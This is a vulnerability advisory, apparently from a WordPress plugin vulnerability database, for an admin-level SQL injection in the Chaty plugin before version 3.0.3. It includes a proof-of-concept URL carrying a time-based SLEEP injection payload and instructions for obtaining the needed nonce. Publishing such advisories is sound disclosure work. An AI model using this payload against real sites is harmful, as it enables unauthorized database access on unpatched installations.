Chaty < 3.0.3 – Admin+ SQLi | CVE 2022-3858 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.

Proof of Concept

https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B--+-

To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads

Affects Plugins

Fixed in 3.0.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter

Verified

Yes

WPVDB ID

d251b6c1-602b-4d72-9d6a-bf5d5ec541ec

Timeline

Publicly Published

2022-11-14 (about 1 years ago)

Added

2022-11-14 (about 1 years ago)

Last Updated

2022-11-14 (about 1 years ago)

Other

Published

Title

Published

2011-08-17

Title

Contus HD FLV Player <= 1.3 - SQL Injection

Published

2024-04-25

Title

XStore Core <= 5.3.5 - Unauthenticated SQL Injection

Published

2023-04-03

Title

Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi

Published

2015-02-13

Title

Calendar by WD < 1.4.14 - Unauthenticated SQL Injection

Published

2014-08-01

Title

WP-SpamFree 3.2.1 - Spam SQL Injection